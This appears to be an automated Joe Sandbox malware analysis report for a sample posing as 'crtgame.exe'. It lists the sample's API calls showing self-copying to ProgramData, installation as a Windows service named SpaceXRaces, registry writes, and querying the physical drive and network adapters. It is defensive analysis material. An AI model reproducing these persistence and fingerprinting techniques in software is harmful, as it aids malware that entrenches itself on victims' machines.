                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$FileSystem
                                                                                            • String ID: $pI
                                                                                            • API String ID: 2086374402-3761944556
                                                                                            • Opcode ID: 3f9a07e309d28d3ed69bb25488f66f46ea45110b2c662fe6765c70228e66d0e6
                                                                                            • Instruction ID: 229b1bfa25ea94c428731b1611971c6890b9b5f6c230ce37e6a86d23df0ccc86
                                                                                            • Opcode Fuzzy Hash: 3f9a07e309d28d3ed69bb25488f66f46ea45110b2c662fe6765c70228e66d0e6
                                                                                            • Instruction Fuzzy Hash: DFD05B7340830C66CF01F1E5AC82CCFB79CD504324F100677A118A25C1FE39A654565C
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastSleep
                                                                                            • String ID:
                                                                                            • API String ID: 1458359878-0
                                                                                            • Opcode ID: b3d8df4fac529f1e6ef3b03e70e70f14952c107ad600f92b177c80a496392a1c
                                                                                            • Instruction ID: 9275ee504a9eb35dba3a5523cc5197587f06a42b27f59d217f7189e04cd8cbf1
                                                                                            • Opcode Fuzzy Hash: b3d8df4fac529f1e6ef3b03e70e70f14952c107ad600f92b177c80a496392a1c
                                                                                            • Instruction Fuzzy Hash: 1FF024B6B04514678F20E99FD881B2F62CCDAD836E710012BFC04DF343C438EE8986A9

                                                                                            Execution Graph

                                                                                            Execution Coverage:21.7%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:13.5%
                                                                                            Total number of Nodes:399
                                                                                            Total number of Limit Nodes:7

                                                                                            Callgraph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            • Opacity -> Relevance
                                                                                            • Disassembly available

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(00000000,?,00000000), ref: 00402714
• GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\CRTGame\crtgame.exe,00000104,?,00000000), ref: 0040272B
• GetCommandLineW.KERNEL32(?,?,00000000), ref: 00402748
• CommandLineToArgvW.SHELL32(00000000,?,00000000), ref: 0040274F
• GetLocalTime.KERNEL32(00409F20,?,00000000), ref: 0040275C
• lstrcmpiW.KERNELBASE(?,/chk,?,00000000), ref: 0040277E
• CreateFileA.KERNEL32(C:\Program Files (x86)\CRTGame\crtgame.exe,40000000,00000000,00000000,00000002,00000020,00000000,?,00000000), ref: 004027CB
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 004027D2
• ExitProcess.KERNEL32 ref: 004027D9
• lstrcmpiW.KERNEL32(?,00407104,?,00000000), ref: 004027FB
• RegCreateKeyExA.KERNELBASE(80000002,Software\SpaceRaces,00000000,00000000,00000000,00000006,00000000,?,?,?,00000000), ref: 0040282A
• GetTickCount.KERNEL32 ref: 0040284D
• wsprintfA.USER32 ref: 00402865
• RegSetValueExA.KERNELBASE(?,?,00000000,00000004,?,00000004), ref: 00402888
• RegCloseKey.KERNELBASE(?), ref: 00402891
• StartServiceCtrlDispatcherA.ADVAPI32(?,?,00000000), ref: 0040294C
Strings
Memory Dump Source
• Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
Similarity
• API ID: CloseCommandCreateFileHandleLineModulelstrcmpi$ArgvCountCtrlDispatcherExitLocalNameProcessServiceStartTickTimeValuewsprintf
• String ID: /chk$C:\Program Files (x86)\CRTGame\crtgame.exe$Software\SpaceRaces$SpaceXRaces$SpaceXRaces$test$tsr1209%d
• API String ID: 99468869-3986529438
• Opcode ID: 803341d37248f940fd6434f59c57290a4552a2c8ba3ceefaceaf479661161746
• Instruction ID: 49dc81ac6bcf3fd683536614608e289c009f5af55911e209b1bd681bcac14ea3
• Opcode Fuzzy Hash: 803341d37248f940fd6434f59c57290a4552a2c8ba3ceefaceaf479661161746
• Instruction Fuzzy Hash: 4B5131B1940209BFEB10DBA09E49FAE7BBCEB04345F104076F606F21E1D7789D148B69

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,00000000,7591F360,00000000), ref: 00402582
• GetModuleFileNameA.KERNEL32(00000000,?,?,?,00000000,7591F360,00000000), ref: 00402589
• GetModuleHandleA.KERNEL32(00000000,00000208,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7591F360), ref: 004025EA
• GetModuleFileNameW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7591F360,00000000), ref: 004025F1
• RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,?), ref: 00402608
• RegQueryValueExA.KERNELBASE(?,Common AppData,00000000,00000001,C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,?), ref: 00402632
• RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7591F360,00000000), ref: 00402643
• CreateDirectoryA.KERNELBASE(C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,00000000), ref: 00402665
• CopyFileA.KERNEL32(?,C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,00000000), ref: 00402694
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 004026A2
• CreateServiceA.ADVAPI32(00000000,SpaceXRaces,SpaceXRaces,000F01FF,00000010,00000002,00000001,C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,00000000,00000000,00000000,00000000,00000000), ref: 004026C3
• CloseServiceHandle.ADVAPI32(00000000), ref: 004026D0
• CloseServiceHandle.ADVAPI32(00000000), ref: 004026E4
• CloseServiceHandle.ADVAPI32(00000000), ref: 004026E9
Strings
Memory Dump Source
• Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
Similarity
• API ID: Handle$CloseModuleService$File$CreateNameOpen$CopyDirectoryManagerQueryValue
• String ID: .exe$C:\ProgramData\SpaceXRaces\SpaceXRaces.exe$Common AppData$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$SpaceXRaces
• API String ID: 3461818117-4011302265
• Opcode ID: e4531a07c198f35eececefb098e8f84c19a8225dec0d5426053034b5013efb8f
• Instruction ID: a3d5b12e1f90bb5d6e2ef9e639674f7dcae6e36a2f4b11c7066e8bc7fc52f7b9
• Opcode Fuzzy Hash: e4531a07c198f35eececefb098e8f84c19a8225dec0d5426053034b5013efb8f
• Instruction Fuzzy Hash: 264193B1940108BBEB20ABA1DE4EE9F3A6CEF41749F00043AF601B11D2D7BD5D508A7D

Control-flow Graph (image; executed and not-executed basic blocks 401b54-401c2e; calls LoadLibraryA, GetProcAddress, GetAdaptersInfo, FreeLibrary and subroutines 402d20, 4018cc, 402d06, 402cf8)

APIs
• LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B66
• GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B7D
• GetAdaptersInfo.IPHLPAPI(?,00000400,00000000,00000000,00000000), ref: 00401BA6
• FreeLibrary.KERNEL32(00401A3E), ref: 00401C24
Strings
Memory Dump Source
• Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
Similarity
• API ID: Library$AdaptersAddressFreeInfoLoadProc
• String ID: GetAdaptersInfo$iphlpapi.dll$o
• API String ID: 514930453-3667123677
• Opcode ID: a9615e917c7d8da21abece12906e102e054d7a7f96f05c26df3a9cf8b4b55db1
• Instruction ID: 19d1f7c7220f150a124496b0f3bded62544c7fcf715814b2fda3adae34ef3130
• Opcode Fuzzy Hash: a9615e917c7d8da21abece12906e102e054d7a7f96f05c26df3a9cf8b4b55db1
• Instruction Fuzzy Hash: 9D21B870944209AFEF21DFA5C9447EFBBB4EF45344F0440BAE504B22E1E7789A85CB69

Control-flow Graph (image; executed and not-executed basic blocks 401a58-401b53; calls CreateFileA, DeviceIoControl, GetLastError, CloseHandle and subroutines 402d06, 402d20, 4018cc, 402cf8)

APIs
• CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000), ref: 00401A74
• DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401ABB
• GetLastError.KERNEL32 ref: 00401B17
• CloseHandle.KERNELBASE(?), ref: 00401B46
Strings
Memory Dump Source
• Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
Similarity
• API ID: CloseControlCreateDeviceErrorFileHandleLast
• String ID: \\.\PhysicalDrive0
• API String ID: 4026078076-1180397377
• Opcode ID: 4b276423cefb6535b93749f4a35407bbc40f2b1ddf316d430708a30b7fc217e3
• Instruction ID: 2ab55ed144571c3fa2fc985b9ad89e39486dc60e53794fabb09e903d28ee3d3f
• Opcode Fuzzy Hash: 4b276423cefb6535b93749f4a35407bbc40f2b1ddf316d430708a30b7fc217e3
• Instruction Fuzzy Hash: 9E317A71D00118AADB21EF96CD849EFBBB9EF40750F20817AE515B22A0E3785E45CF98

Control-flow Graph

APIs
• GetVersion.KERNEL32 ref: 00402F98
  • Part of subcall function 004032AA: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402FD1,00000000), ref: 004032BB
  • Part of subcall function 004032AA: HeapDestroy.KERNEL32 ref: 004032FA
• GetCommandLineA.KERNEL32 ref: 00402FE6
• GetStartupInfoA.KERNEL32(?), ref: 00403011
• GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00403034
  • Part of subcall function 0040308D: ExitProcess.KERNEL32 ref: 004030AA
Memory Dump Source
• Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
Similarity
• API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
• String ID:
• API String ID: 2057626494-0
• Opcode ID: 6973291a08a62e7008eca22fd321bc7397b23a4f1d73c5b2d439b14b6e22de47
• Instruction ID: 67841cd3009d396f381f20147254ff52d2e2d79fbc7827c85a5f588a1a3baf3d
• Opcode Fuzzy Hash: 6973291a08a62e7008eca22fd321bc7397b23a4f1d73c5b2d439b14b6e22de47
• Instruction Fuzzy Hash: 24217FB1800714AADB04AFA6DD0AA6E7BB9EB45704F10413EFA05BB2D1DB384850CB59

Control-flow Graph (image; executed and not-executed basic blocks 401c5b-401cbc; calls GetWindowsDirectoryA, CreateFileA, GetFileTime, CloseHandle)

APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00401C74
• CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 00401C95
• GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00401CA8
• CloseHandle.KERNEL32(00000000), ref: 00401CB1
Memory Dump Source
• Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
Similarity
• API ID: File$CloseCreateDirectoryHandleTimeWindows
• String ID:
• API String ID: 87451460-0
• Opcode ID: e2397ba6e5c18c7e638a70f9a661d1ac9407ea32cfd96cdb9d4eb31bc9736a0d
• Instruction ID: cc4b8a8173e68006100f6bb5cfe5cbca554eec38252bcd741f722b6c7c402e1e
• Opcode Fuzzy Hash: e2397ba6e5c18c7e638a70f9a661d1ac9407ea32cfd96cdb9d4eb31bc9736a0d
• Instruction Fuzzy Hash: 7CF0E27668021077E6209B359E8DFCB3AAD9BC6B60F010134BB46F21D0D6B49551C6B4

Control-flow Graph (image; executed and not-executed basic blocks 4041cb-404263; calls GetCurrentProcess, TerminateProcess, ExitProcess and subroutine 404264)

APIs
• GetCurrentProcess.KERNEL32(?,?,004041B6,?,00000000,00000000,00403049,00000000,00000000), ref: 004041DB
• TerminateProcess.KERNEL32(00000000,?,004041B6,?,00000000,00000000,00403049,00000000,00000000), ref: 004041E2
• ExitProcess.KERNEL32 ref: 0040425C
Memory Dump Source
• Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 78841f2a515f296da85e0e90675676ac3a79d5512f1734095c42bbe5f9917e88
• Instruction ID: 04da20acb35bf9441239f1d62556dfb4fa7ea4fed694bd47aa7006e356793b78
• Opcode Fuzzy Hash: 78841f2a515f296da85e0e90675676ac3a79d5512f1734095c42bbe5f9917e88
• Instruction Fuzzy Hash: 8E01D2B2648300DEDA10AF65FE44A0A7BA4FBD4790B10857FF281771E0D739A851CA2E

Control-flow Graph (image; executed and not-executed basic blocks 4032aa-403306; calls HeapCreate, HeapDestroy and subroutines 403162, 403307, 403b58)

APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000,00402FD1,00000000), ref: 004032BB
  • Part of subcall function 00403162: GetVersionExA.KERNEL32 ref: 00403181
• HeapDestroy.KERNEL32 ref: 004032FA
  • Part of subcall function 00403307: HeapAlloc.KERNEL32(00000000,00000140,004032E3,000003F8), ref: 00403314
Memory Dump Source
• Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
Similarity
• API ID: Heap$AllocCreateDestroyVersion
• String ID:
• API String ID: 2507506473-0
• Opcode ID: 0b849b835aecce10534f7c8868f1023d210904a4762ffb57ab141a925f8bfac6
• Instruction ID: 5e09d6e980c9b6bd0e9d6ae44655ccf46c8d477683af571ce1b4adb312d05453
• Opcode Fuzzy Hash: 0b849b835aecce10534f7c8868f1023d210904a4762ffb57ab141a925f8bfac6
• Instruction Fuzzy Hash: C5F065306543019AEB201F309E4AB2A3EA89754757F14483BF841FD1D1EF7D8691950E

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • RegisterServiceCtrlHandlerA.ADVAPI32(SpaceXRaces,Function_000023D3), ref: 00402436
                                                                                            • SetServiceStatus.ADVAPI32(0040A058), ref: 00402495
                                                                                            • GetLastError.KERNEL32 ref: 00402497
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004024A4
                                                                                            • GetLastError.KERNEL32 ref: 004024C5
                                                                                            • SetServiceStatus.ADVAPI32(0040A058), ref: 004024F5
                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00002351,00000000,00000000,00000000), ref: 00402501
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040250A
                                                                                            • CloseHandle.KERNEL32 ref: 00402516
                                                                                            • SetServiceStatus.ADVAPI32(0040A058), ref: 0040253F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                                            • String ID: SpaceXRaces
                                                                                            • API String ID: 3346042915-182686438
                                                                                            • Opcode ID: cdb2bee97ed7bb97cf955b6f798025c993403a3b9e37aa79489956d55700b49b
                                                                                            • Instruction ID: 823e7604a9f11b62abb5769871faa090ae10b28c447e591ffcb139ee33df3efb
                                                                                            • Opcode Fuzzy Hash: cdb2bee97ed7bb97cf955b6f798025c993403a3b9e37aa79489956d55700b49b
                                                                                            • Instruction Fuzzy Hash: F821A9B0841348EBD2119F36FF48E177FA8EB96719715813AE505B22B0C7BA0464DF2E

                                                                                             Control-flow Graph
                                                                                             • Basic blocks 405b6f-405d8e (graph rendering not preserved); API calls: LCMapStringW, LCMapStringA, MultiByteToWideChar, WideCharToMultiByte; internal calls: 405d93, 402da0
                                                                                            APIs
                                                                                            • LCMapStringW.KERNEL32(00000000,00000100,004065F4,00000001,00000000,00000000,00000103,00000001,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000), ref: 00405BB1
                                                                                            • LCMapStringA.KERNEL32(00000000,00000100,004065F0,00000001,00000000,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BCD
                                                                                            • LCMapStringA.KERNEL32(?,?,?,?,N@ ,?,00000103,00000001,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000), ref: 00405C16
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000), ref: 00405C4E
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CA6
                                                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CBC
                                                                                            • LCMapStringW.KERNEL32(?,?,?,00000000,N@ ,?,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CEF
                                                                                            • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405D57
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: String$ByteCharMultiWide
                                                                                            • String ID: N@
                                                                                            • API String ID: 352835431-2588724849
                                                                                            • Opcode ID: 50f7acbb545500e936848391daa4b4f79838f587710a5a8d37350ffe5be9aa75
                                                                                            • Instruction ID: 59135ce53bc3b83908b259842d99def5e9dba23692ba7c4f82a52b333c41bde6
                                                                                            • Opcode Fuzzy Hash: 50f7acbb545500e936848391daa4b4f79838f587710a5a8d37350ffe5be9aa75
                                                                                            • Instruction Fuzzy Hash: 69516B31500609ABDF218F54CD45E9F7BB9EB48710F10813AF912B12A0D33A9961EF69

                                                                                             Control-flow Graph
                                                                                             • Basic blocks 4058a7-40592e (graph rendering not preserved); API calls: LoadLibraryA, GetProcAddress (three call sites)
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404D6D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406528,?,00406578,?,?,?,Runtime Error!Program: ), ref: 004058B9
                                                                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004058D1
                                                                                            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004058E2
                                                                                            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004058EF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                            • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll$xe@
                                                                                            • API String ID: 2238633743-4073082454
                                                                                            • Opcode ID: ee458f46fe1812a05d91eb71287a3930c9b5d9979fa11f14182ddc6a57f11331
                                                                                            • Instruction ID: 33924f41f48bfa595f86144282b4f53d1c2fc39b1daf6c652de04afaa2dac454
                                                                                            • Opcode Fuzzy Hash: ee458f46fe1812a05d91eb71287a3930c9b5d9979fa11f14182ddc6a57f11331
                                                                                            • Instruction Fuzzy Hash: F4017171640711EFC7109FB5AD8091B3BE8EA887A0712043FA505F23E2DA7988619F2D

                                                                                             Control-flow Graph
                                                                                             • Basic blocks 405dbe-405f06 (graph rendering not preserved); API calls: GetStringTypeW, GetStringTypeA, MultiByteToWideChar; internal calls: 402da0, 402ca0
                                                                                            APIs
                                                                                            • GetStringTypeW.KERNEL32(00000001,004065F4,00000001,00000000,00000103,00000001,00000000,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DFD
                                                                                            • GetStringTypeA.KERNEL32(00000000,00000001,004065F0,00000001,?,?,00000000,00000000,00000001), ref: 00405E17
                                                                                            • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E4B
                                                                                            • MultiByteToWideChar.KERNEL32(N@ ,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E83
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00405ED9
                                                                                            • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00405EEB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: StringType$ByteCharMultiWide
                                                                                            • String ID: N@
                                                                                            • API String ID: 3852931651-2588724849
                                                                                            • Opcode ID: b846b538efdd308b61092c0b21f0a934ff7444516eeaa1663e1030bce46bb4c8
                                                                                            • Instruction ID: efd9f9df0c83a1a94f90d52e1acc00adac850a8b7f95784ade7c71040f2db77a
                                                                                            • Opcode Fuzzy Hash: b846b538efdd308b61092c0b21f0a934ff7444516eeaa1663e1030bce46bb4c8
                                                                                            • Instruction Fuzzy Hash: 6E414C72900619AFCF209F94DD85EAF7B78FB08750F10443AF912B2290D7398A619B99
                                                                                            APIs
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404CB6
                                                                                            • GetStdHandle.KERNEL32(000000F4,00406528,00000000,?,00000000,00000000), ref: 00404D8C
                                                                                            • WriteFile.KERNEL32(00000000), ref: 00404D93
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$HandleModuleNameWrite
                                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                            • API String ID: 3784150691-4022980321
                                                                                            • Opcode ID: 3f183e7b97676ec7bc44c608dee57f0da837cd1f80663b04b7f3573c67123c93
                                                                                            • Instruction ID: 66213c8598c100419aca2a23d32cbd7848d5265dc6afe1337dc7fe815477c880
                                                                                            • Opcode Fuzzy Hash: 3f183e7b97676ec7bc44c608dee57f0da837cd1f80663b04b7f3573c67123c93
                                                                                            • Instruction Fuzzy Hash: 4B31A7B2600218BEEF20EA60DD49FDA376CEF85304F1005BBF545F61D1D6B8AD548A5D
                                                                                            APIs
                                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 0040477B
                                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 0040478F
                                                                                            • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 004047BB
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FF6), ref: 004047F3
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FF6), ref: 00404815
                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402FF6), ref: 0040482E
                                                                                            • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 00404841
                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040487F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 1823725401-0
                                                                                            • Opcode ID: 5b86ae991fad7257a9556b843b73270ba3d506a60895f98d1aae2807b58742cd
                                                                                            • Instruction ID: d94799acc24e98fca2fbef921ce91b810f6c8713fa78e77f5a065486d65e4eae
                                                                                            • Opcode Fuzzy Hash: 5b86ae991fad7257a9556b843b73270ba3d506a60895f98d1aae2807b58742cd
                                                                                            • Instruction Fuzzy Hash: CA31F2F75042A55ED7207BB59C8483B76DCE6C5358711893FFA42F3280E6398C4186A9
                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(00000000,0000000A,00000000), ref: 00402011
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 0040201D
                                                                                            • SizeofResource.KERNEL32(00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 0040202A
                                                                                            • LoadResource.KERNEL32(00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 00402044
                                                                                            • LockResource.KERNEL32(00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 0040204B
                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 00402056
                                                                                            • GetTickCount.KERNEL32 ref: 00402092
                                                                                            • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,004023A6,00000190,00409F34), ref: 004020F8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2076336280.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000005.00000002.2076336280.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                            • String ID:
                                                                                            • API String ID: 564119183-0
                                                                                            • Opcode ID: f1ea5436b47a97949242679e62fd8c16215760983c098ca12679752f31ddac83
                                                                                            • Instruction ID: ecab55d02aed30cb2302f8ec7062e98c1eb40003726056bc5c009be87fd8cf01
